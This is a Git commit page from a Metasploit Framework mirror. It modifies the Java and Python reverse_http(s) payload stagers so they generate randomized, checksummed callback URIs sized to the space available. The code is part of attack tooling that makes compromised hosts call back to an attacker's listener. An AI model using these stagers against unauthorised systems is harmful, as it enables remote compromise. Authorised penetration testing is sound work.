infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #4951: Dynamic URI generation for Java/Python reverse_http(s)

bug/bundler_fix
OJ 2015-03-19 12:41:20 +10:00
parent 076f15f933 346b1d539f
commit 1a2f35d806
No known key found for this signature in database
GPG Key ID: D5DC61FB93260597
3 changed files with 58 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

14
modules/payloads/stagers/java/reverse_http.rb
View File

@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_http'
module Metasploit3
CachedSize = 5500
CachedSize = 5499
include Msf::Payload::Stager
include Msf::Payload::Java
@ -40,12 +40,22 @@ module Metasploit3
end
def config
# Default URL length is 30-256 bytes
uri_req_len = 30 + rand(256-30)
# Generate the short default URL if we don't know available space
if self.available_space.nil?
uri_req_len = 5
end
spawn = datastore["Spawn"] || 2
c = ""
c << "Spawn=#{spawn}\n"
c << "URL=http://#{datastore["LHOST"]}"
c << ":#{datastore["LPORT"]}" if datastore["LPORT"]
c << "/INITJM\n"
c << "/"
c << generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITJ, uri_req_len)
c << "\n"
c
end

14
modules/payloads/stagers/java/reverse_https.rb
View File

@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_https'
module Metasploit3
CachedSize = 6308
CachedSize = 6307
include Msf::Payload::Stager
include Msf::Payload::Java
@ -42,12 +42,22 @@ module Metasploit3
end
def config
# Default URL length is 30-256 bytes
uri_req_len = 30 + rand(256-30)
# Generate the short default URL if we don't know available space
if self.available_space.nil?
uri_req_len = 5
end
spawn = datastore["Spawn"] || 2
c = ""
c << "Spawn=#{spawn}\n"
c << "URL=https://#{datastore["LHOST"]}"
c << ":#{datastore["LPORT"]}" if datastore["LPORT"]
c << "/INITJM\n"
c << "/"
c << generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITJ, uri_req_len)
c << "\n"
c
end

36
modules/payloads/stagers/python/reverse_http.rb
View File

@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_http'
module Metasploit3
CachedSize = 442
CachedSize = 446
include Msf::Payload::Stager
@ -50,7 +50,7 @@ module Metasploit3
target_url << ':'
target_url << datastore['LPORT'].to_s
target_url << '/'
target_url << generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITP)
target_url << generate_callback_uri
proxy_host = datastore['PayloadProxyHost'].to_s
proxy_port = datastore['PayloadProxyPort'].to_i
@ -77,4 +77,36 @@ module Metasploit3
b64_stub << "')))"
return b64_stub
end
#
# Determine the maximum amount of space required for the features requested
#
def required_space
# Start with our cached default generated size
space = cached_size
# Add 100 bytes for the encoder to have some room
space += 100
# Make room for the maximum possible URL length
space += 256
# The final estimated size
space
end
#
# Return the longest URL that fits into our available space
#
def generate_callback_uri
uri_req_len = 30 + rand(256-30)
# Generate the short default URL if we don't have enough space
if self.available_space.nil? || required_space > self.available_space
uri_req_len = 5
end
generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITP, uri_req_len)
end
end